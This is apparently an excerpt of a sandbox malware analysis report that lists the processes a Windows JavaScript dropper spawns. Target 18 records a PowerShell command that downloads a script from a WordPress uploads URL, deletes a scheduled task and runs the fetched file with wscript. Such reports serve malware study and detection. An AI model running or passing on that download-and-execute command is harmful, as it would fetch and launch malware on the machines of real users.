                                        Commandline:"C:\Windows\system32\wscript.exe" C:\ProgramData\V58W09DALJEK.js
                                        Imagebase:0x7ff729c70000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:17
                                        Start time:03:16:00
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js
                                        Imagebase:0x7ff729c70000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:18
                                        Start time:03:16:00
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "
                                        Imagebase:0x7ff788560000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:19
                                        Start time:03:16:00
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false
